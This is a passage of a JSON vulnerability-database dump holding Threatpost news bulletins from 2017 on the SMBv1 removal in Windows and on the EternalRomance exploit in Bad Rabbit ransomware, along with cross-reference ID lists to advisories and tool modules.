["CVE-2017-0143", "CVE-2020-0688"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:FB34BB37115EDA1532715EDC5BCED9C2", "THREATPOST:C70A342E0B6FAB078006E6B3DF8178A5", "THREATPOST:B991F2CF870C98BD40B817DE3CDF52A0", "THREATPOST:5329E007F295711D2BA9C149269B7B5A", "THREATPOST:3D7ABC1C5B95C6E6C4D4530DD377DAC6", "THREATPOST:13B65410050EE2481FFF6529E376C3DE", "THREATPOST:3BB4E0E1572CB407D8E229113D737B67", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:36B379AB7961800661672D1834D06918", "THREATPOST:85C6E4DB7228933D258699492AA2C713", "THREATPOST:62A9CA4CC9F9EE48883992304A29438C"]}], "modified": "2020-04-08T11:38:06", "rev": 2}, "score": {"value": 5.0, "vector": "NONE", "modified": "2020-04-08T11:38:06", "rev": 2}}, "objectVersion": "1.4"}, "lastseen": "2020-04-08T11:38:06", "differentElements": ["cvelist"], "edition": 6}], "viewCount": 41, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "threatpost", "idList": ["THREATPOST:13B65410050EE2481FFF6529E376C3DE", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:B991F2CF870C98BD40B817DE3CDF52A0"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}], "modified": "2020-04-09T11:37:03", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2020-04-09T11:37:03", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.threatpost.ThreatpostBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.threatpost.ThreatpostBulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "hash": "a4260822387bc7aa1a30cfeb75af497f", "type": "threatpost", "bulletinFamily": "info", "title": "SMBv1 to be Disabled in Windows Fall Creators Update", "description": "The crusty SMBv1 file-sharing protocol, abused by a [NSA exploit](<https://threatpost.com/leaked-nsa-exploit-spreading-ransomware-worldwide/125654/>) last month that spread [WannaCry](<https://threatpost.com/someone-failed-to-contain-wannacry/126335/>), will be removed from Windows 10 starting with the upcoming Redstone 3 update.\n\n\u201cWe can confirm that SMBv1 is being removed for Redstone 3,\u201d a Microsoft representative told Threatpost.\n\nRedstone 3, a code-name for the Fall Creators Update, will begin the phasing out of SMBv1, a plan that reportedly has been in the works for years and is not a reaction to the EternalBlue exploit, nor WannaCry. It is due in September.\n\nSMBv1, short for the Server Message Block protocol, provides shared access to Windows file and print services on a local network. Attackers believed to have [ties to North Korea](<https://threatpost.com/wannacry-shares-code-with-lazarus-apt-samples/125718/>) used the EternalBlue exploit, leaked in April by the ShadowBrokers, to spread the ransomware worldwide on May 12. Hospitals in the U.K., giant telecommunications providers across Europe, and many businesses in Russia and across Asia fell victim to WannaCry, which eventually infected unpatched Windows servers running SMBv1 in more than 150 countries.\n\nMicrosoft had [patched the SMBv1 vulnerability](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>) in question in March in MS17-010, one month before the ShadowBrokers\u2019 leak, and urged admins worldwide to install the patch immediately. The WannaCry outbreak, however, demonstrated that many organizations did not heed those warnings; the ransomware, generally derided for its shoddy coding, still managed to infect more than 200,000 servers.\n\nThe weaponized version of EternalBlue released by the ShadowBrokers is effective against only Windows 7 and Windows XP machines, but researchers at RiskSense were able to build a [Windows 10 port](<https://threatpost.com/nsas-eternalblue-exploit-ported-to-windows-10/126087/>) that bypasses some of the mitigations in the Current Branch for Business version of the operating system. While a report on RiskSense\u2019s Windows 10 version of the attack is available, researchers won\u2019t release new offsets used to weaponize their attack.\n\nMicrosoft, meanwhile, continues to plead with users running legacy versions of Windows to upgrade to Windows 10. The current version of the operating system includes a number of [mitigations](<https://threatpost.com/windows-10-mitigations-make-future-eternalblue-attacks-difficult/126132/>) to deny EternalBlue and other weapons-grade Windows attacks leaked in April. Researchers echo those pleas as well, praising Windows 10\u2019s mitigations such as kernel ASLR and DEP and virtualization-based security in Device Guard.\n\nMicrosoft this week released an [analysis of EternalBlue and EternalRomance](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>), another SMB remote code execution attack and describe how each of the above mitigations, in addition to kernel Control Flow Guard, break the exploits available in the wild.\n\n\u201cThrough VBS\u2019s usage of CPU hypervisor functionality, Device Guard-enabled systems can verify and enforce integrity of code that\u2019s mapped in the kernel address space,\u201d wrote Viktor Brange of the Windows Offensive Security Research Team. \u201ckCFG prevents many exploitation techniques that rely on corrupting function pointers to achieve code execution.\u201d\n\nWhile EternalBlue and its [DoublePulsar backdoor](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) have been studied on many fronts, EternalRomance is another SMBv1 attack that exploits a separate vulnerability, CVE-2017-0145, to gain remote code execution capabilities.\n\n\u201cThis exploit was written to remotely install and launch an SMB backdoor. At the core of this exploit is a type confusion vulnerability leading to an attacker offset controlled arbitrary heap write,\u201d Brange wrote. \u201cAs with almost any heap corruption exploit, the attacker must know or control the layout of the heap to consistently succeed. With SMB, most objects are allocated in the non-paged pool.\u201d\n\nIn its analysis, Microsoft explains how an attacker could learn a reliable heap layout, build primitives from corruption of the heap, and how all this enables installation of the in-memory backdoor.\n\nIn addition to patching, Microsoft warns customers that exposing port 445 to the internet are making a massive mistake, and that SMB should be run inside the firewall.\n\n\u201cHowever, if an attacker has access to a vulnerable endpoint running SMB, the ability to run arbitrary code in kernel context from a remote location is a serious compromise,\u201d Microsoft said.\n", "published": "2017-06-20T08:41:13", "modified": "2017-06-26T19:14:10", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/say-goodbye-to-smbv1-in-windows-fall-creators-update/126387/", "reporter": "Michael Mimoso", "references": ["https://threatpost.com/leaked-nsa-exploit-spreading-ransomware-worldwide/125654/", "https://threatpost.com/someone-failed-to-contain-wannacry/126335/", "https://threatpost.com/wannacry-shares-code-with-lazarus-apt-samples/125718/", "https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/", "https://threatpost.com/nsas-eternalblue-exploit-ported-to-windows-10/126087/", "https://threatpost.com/windows-10-mitigations-make-future-eternalblue-attacks-difficult/126132/", "https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/", "https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/"], "cvelist": ["CVE-2017-0145"], "lastseen": "2018-10-06T22:53:32", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2018-10-06T22:53:32", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:650FC16DA0E29CB420C07AFBAE04975B", "THREATPOST:B304599C15AAF854E03A81B1E0ADE266", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:A8C0E6204F3BAD7A47B000396784E9F3", "THREATPOST:77FA220EA5F50111A13B99DBCBA23056", "THREATPOST:0DADADE0EE7F12281751AAC885E7F84B", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:889131AAE542197C8EEEF4B05D87D477", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2018-10-06T22:53:32", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.threatpost.ThreatpostBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.threatpost.ThreatpostBulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "hash": "fd10306305813faafb2a2ad8d6b050fb", "type": "threatpost", "bulletinFamily": "info", "title": "EternalRomance Exploit Found in Bad Rabbit Ransomware", "description": "One day after [clear ties were established](<https://threatpost.com/bad-rabbit-linked-to-expetrnot-petya-attacks/128611/>) between the [Bad Rabbit ransomware](<https://threatpost.com/badrabbit-ransomware-attacks-hitting-russia-ukraine/128593/>) attacks and this summer\u2019s NotPetya outbreak, researchers at Cisco today strengthened that bond disclosing that the leaked NSA exploit EternalRomance was used to spread the malware on compromised networks.\n\nThis contradicts earlier reports that neither EternalRomance nor EternalBlue were part of this week\u2019s ransomware attack that was confined primarily to Russia and the Ukraine.\n\nCisco said in an [ongoing analysis of Bad Rabbit](<http://blog.talosintelligence.com/2017/10/bad-rabbit.html>) that the implementation of the EternalRomance exploit used in Bad Rabbit has been modified.\n\n\u201cThis is a different implementation of the EternalRomance exploit,\u201d said Martin Lee, technical lead of security research for Cisco\u2019s research arm, Talos. \u201cIt\u2019s different code from what we saw used in NotPetya, but exploiting the same vulnerability in a slightly different implementation.\u201d\n\nEternalRomance is one of a number of Windows exploits [leaked in April by the ShadowBrokers](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>), a still unidentified group that has been [leaking Equation Group exploits](<https://threatpost.com/shadowbrokers-leak-has-strong-connection-to-equation-group/119941/>) for more than a year. Many of those attacks, however, were mitigated in [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), a Microsoft security bulletin that included patches for vulnerabilities in the SMBv1 protocol abused by these exploits.\n\nThe publicly available exploits affect older versions of Windows (XP through 7 on the client side and 2003-2008 on Windows Server).\n\nEternalRomance is a remote code execution attack that exploits CVE-2017-0145. What exacerbated the WannaCry and NotPetya attacks was the fact that many organizations had SMBv1 exposed to the internet rather than solely internally. This allowed WannaCry in particular to worm out to the internet and affect machines outside a compromised network.\n\n\u201cThis exploit was written to remotely install and launch an SMB backdoor. At the core of this exploit is a type confusion vulnerability leading to an attacker offset controlled arbitrary heap write,\u201d Microsoft said in [an analysis of EternalRomance](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) published in June. \u201cAs with almost any heap corruption exploit, the attacker must know or control the layout of the heap to consistently succeed.\u201d\n\nCisco said in its look at Bad Rabbit this week that it found a type confusion attempt similar to EternalRomance.\n\n\u201cWe can be fairly confident that BadRabbit includes an EternalRomance implementation used to overwrite a kernel\u2019s session security context to enable it to launch remote services, while in Nyetya it was used to install the DoublePulsar backdoor,\u201d Cisco said. \u201cBoth actions are possible due to the fact that EternalRomance allows the attacker to read/write arbitrary data into the kernel memory space.\u201d\n\nDoublePulsar is a post-exploitation memory-based kernel payload that hooks onto x86 and 64-bit systems and allows an attacker to execute any raw shellcode payload they wish. It was part of the Fuzzbunch exploit platform leaked by the Shadowbrokers.\n\n\u201cThis is a full ring0 payload that gives you full control over the system and you can do what you want to it,\u201d said Sean Dillon, senior security analyst at RiskSense. Dillon was the first to reverse-engineer a DoublePulsar payload, and published his [analysis](<https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html>) in April.\n\nResearchers at Kaspersky Lab on Wednesday confirmed the link between Bad Rabbit and NotPetya, finding similarities in the hashing algorithm used in the two attacks, as well as some of the same domains. It also steals credentials by leveraging the Windows utility WMIC.\n\nUnlike NotPetya, Bad Rabbit is not a wiper attack, Kaspersky Lab confirmed today. Cisco\u2019s Lee also confirmed this is not a wiper.\n\n\u201cThe researchers also found that the Bad Rabbit ransomware code doesn\u2019t contain the kind of mistakes that could be used to decrypt victims\u2019 files and data. There is no way to decrypt information without the attackers\u2019 private key,\u201d Kaspersky Lab said today. \u201cHaving said that, the experts have found a flaw in the code of dispci.exe, which means that the malware doesn\u2019t wipe the generated password from the memory \u2013 so there is a slim possibility to extract it.\u201d\n\nKaspersky Lab also said that it saw traces of the attack dating back to July starting with the compromise of high-profile media sites in Russia including Interfax. Government agencies in Turkey, including the metro in Kiev and a major airport were also serving the malware as were other sits in Turkey, Germany and the U.S.\u2014about 200 in all. The attackers, however, pulled the malicious code once Bad Rabbit was made public.\n\nThe malware was spreading primarily through drive-by downloads where the hacked sites were serving up a phony Flash Player installer that executes a dropper on the compromised machine that reaches out to the attacker\u2019s domain for the rest of the attack. The malware relied on user action to trigger the executable and to grant it excessive permissions through a Windows UAC prompt.\n\nWhile ExPetr was wiper malware in the guise of a ransomware attack, Bad Rabbit installs a malicious executable called dispci.exe which is derived from the free and open source disk encryption software called DiskCryptor.\n\n\u201cThe malware modifies the Master Boot Record (MBR) of the infected system\u2019s hard drive to redirect the boot process into the malware authors code for the purposes of displaying a ransom note,\u201d Cisco said. \u201cThe ransom note that is displayed following the system reboot is very similar to the ransom notes displayed by other ransomware variants, namely Petya, that we have observed in other notable attacks this year.\u201d\n\nThe attackers are demanding 0.05 Bitcoin or $298 USD at today\u2019s exchange rate in exchange for the decryption key that will unlock their hard drives. Each victim is assigned a unique payment wallet, simplifying the process for recovery for victims and profit for the attackers.\n", "published": "2017-10-26T13:53:40", "modified": "2017-10-26T13:53:40", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/eternalromance-exploit-found-in-bad-rabbit-ransomware/128645/", "reporter": "Michael Mimoso", "references": ["https://threatpost.com/bad-rabbit-linked-to-expetrnot-petya-attacks/128611/", "https://threatpost.com/badrabbit-ransomware-attacks-hitting-russia-ukraine/128593/", "http://blog.talosintelligence.com/2017/10/bad-rabbit.html", "https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/", "https://threatpost.com/shadowbrokers-leak-has-strong-connection-to-equation-group/119941/", "https://technet.microsoft.com/en-us/library/security/ms17-010.aspx", "https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html"], "cvelist": ["CVE-2017-0145"], "lastseen": "2019-01-23T05:28:27", "history": [{"bulletin": {"id": "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "hash": "a03b87312b3d2b43c42f11b9245307fa", "type": "threatpost", "bulletinFamily": "info", "title": "EternalRomance Exploit Found in Bad Rabbit Ransomware", "description": "One day after [clear ties were established](<https://threatpost.com/bad-rabbit-linked-to-expetrnot-petya-attacks/128611/>) between the [Bad Rabbit ransomware](<https://threatpost.com/badrabbit-ransomware-attacks-hitting-russia-ukraine/128593/>) attacks and this summer\u2019s NotPetya outbreak, researchers at Cisco today strengthened that bond disclosing that the leaked NSA exploit EternalRomance was used to spread the malware on compromised networks.\n\nThis contradicts earlier reports that neither EternalRomance nor EternalBlue were part of this week\u2019s ransomware attack that was confined primarily to Russia and the Ukraine.\n\nCisco said in an [ongoing analysis of Bad Rabbit](<http://blog.talosintelligence.com/2017/10/bad-rabbit.html>) that the implementation of the EternalRomance exploit used in Bad Rabbit has been modified.\n\n\u201cThis is a different implementation of the EternalRomance exploit,\u201d said Martin Lee, technical lead of security research for Cisco\u2019s research arm, Talos. \u201cIt\u2019s different code from what we saw used in NotPetya, but exploiting the same vulnerability in a slightly different implementation.\u201d\n\nEternalRomance is one of a number of Windows exploits [leaked in April by the ShadowBrokers](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>), a still unidentified group that has been [leaking Equation Group exploits](<https://threatpost.com/shadowbrokers-leak-has-strong-connection-to-equation-group/119941/>) for more than a year. Many of those attacks, however, were mitigated in [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), a Microsoft security bulletin that included patches for vulnerabilities in the SMBv1 protocol abused by these exploits.\n\nThe publicly available exploits affect older versions of Windows (XP through 7 on the client side and 2003-2008 on Windows Server).\n\nEternalRomance is a remote code execution attack that exploits CVE-2017-0145. What exacerbated the WannaCry and NotPetya attacks was the fact that many organizations had SMBv1 exposed to the internet rather than solely internally. This allowed WannaCry in particular to worm out to the internet and affect machines outside a compromised network.\n\n\u201cThis exploit was written to remotely install and launch an SMB backdoor. At the core of this exploit is a type confusion vulnerability leading to an attacker offset controlled arbitrary heap write,\u201d Microsoft said in [an analysis of EternalRomance](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) published in June. \u201cAs with almost any heap corruption exploit, the attacker must know or control the layout of the heap to consistently succeed.\u201d\n\nCisco said in its look at Bad Rabbit this week that it found a type confusion attempt similar to EternalRomance.\n\n\u201cWe can be fairly confident that BadRabbit includes an EternalRomance implementation used to overwrite a kernel\u2019s session security context to enable it to launch remote services, while in Nyetya it was used to install the DoublePulsar backdoor,\u201d Cisco said. \u201cBoth actions are possible due to the fact that EternalRomance allows the attacker to read/write arbitrary data into the kernel memory space.\u201d\n\nDoublePulsar is a post-exploitation memory-based kernel payload that hooks onto x86 and 64-bit systems and allows an attacker to execute any raw shellcode payload they wish. It was part of the Fuzzbunch exploit platform leaked by the Shadowbrokers.\n\n\u201cThis is a full ring0 payload that gives you full control over the system and you can do what you want to it,\u201d said Sean Dillon, senior security analyst at RiskSense. Dillon was the first to reverse-engineer a DoublePulsar payload, and published his [analysis](<https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html>) in April.\n\nResearchers at Kaspersky Lab on Wednesday confirmed the link between Bad Rabbit and NotPetya, finding similarities in the hashing algorithm used in the two attacks, as well as some of the same domains. It also steals credentials by leveraging the Windows utility WMIC.\n\nUnlike NotPetya, Bad Rabbit is not a wiper attack, Kaspersky Lab confirmed today. Cisco\u2019s Lee also confirmed this is not a wiper.\n\n\u201cThe researchers also found that the Bad Rabbit ransomware code doesn\u2019t contain the kind of mistakes that could be used to decrypt victims\u2019 files and data. There is no way to decrypt information without the attackers\u2019 private key,\u201d Kaspersky Lab said today. \u201cHaving said that, the experts have found a flaw in the code of dispci.exe, which means that the malware doesn\u2019t wipe the generated password from the memory \u2013 so there is a slim possibility to extract it.\u201d\n\nKaspersky Lab also said that it saw traces of the attack dating back to July starting with the compromise of high-profile media sites in Russia including Interfax. Government agencies in Turkey, including the metro in Kiev and a major airport were also serving the malware as were other sits in Turkey, Germany and the U.S.\u2014about 200 in all. The attackers, however, pulled the malicious code once Bad Rabbit was made public.\n\nThe malware was spreading primarily through drive-by downloads where the hacked sites were serving up a phony Flash Player installer that executes a dropper on the compromised machine that reaches out to the attacker\u2019s domain for the rest of the attack. The malware relied on user action to trigger the executable and to grant it excessive permissions through a Windows UAC prompt.\n\nWhile ExPetr was wiper malware in the guise of a ransomware attack, Bad Rabbit installs a malicious executable called dispci.exe which is derived from the free and open source disk encryption software called DiskCryptor.\n\n\u201cThe malware modifies the Master Boot Record (MBR) of the infected system\u2019s hard drive to redirect the boot process into the malware authors code for the purposes of displaying a ransom note,\u201d Cisco said. \u201cThe ransom note that is displayed following the system reboot is very similar to the ransom notes displayed by other ransomware variants, namely Petya, that we have observed in other notable attacks this year.\u201d\n\nThe attackers are demanding 0.05 Bitcoin or $298 USD at today\u2019s exchange rate in exchange for the decryption key that will unlock their hard drives. Each victim is assigned a unique payment wallet, simplifying the process for recovery for victims and profit for the attackers.\n", "published": "2017-10-26T13:53:40", "modified": "2018-03-01T22:34:02", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/eternalromance-exploit-found-in-bad-rabbit-ransomware/128645/", "reporter": "Michael Mimoso", "references": ["https://threatpost.com/bad-rabbit-linked-to-expetrnot-petya-attacks/128611/", "https://threatpost.com/badrabbit-ransomware-attacks-hitting-russia-ukraine/128593/", "http://blog.talosintelligence.com/2017/10/bad-rabbit.html", "https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/", "https://threatpost.com/shadowbrokers-leak-has-strong-connection-to-equation-group/119941/", "https://technet.microsoft.com/en-us/library/security/ms17-010.aspx", "https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html"], "cvelist": ["CVE-2017-0145"], "lastseen": "2018-10-06T22:52:59", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 9.3, "vector": "NONE", "modified": "2018-10-06T22:52:59"}}, "objectVersion": "1.4"}, "lastseen": "2018-10-06T22:52:59", "differentElements": ["modified"], "edition": 1}], "viewCount": 7, "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2019-01-23T05:28:27", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:AA6D3EA1C08F9351B439C71FBB922DC0", "THREATPOST:1C21561E1E395A6D3467AA1021D15E29", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:66026C087D3B47DD603E93D1B2559B16", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", 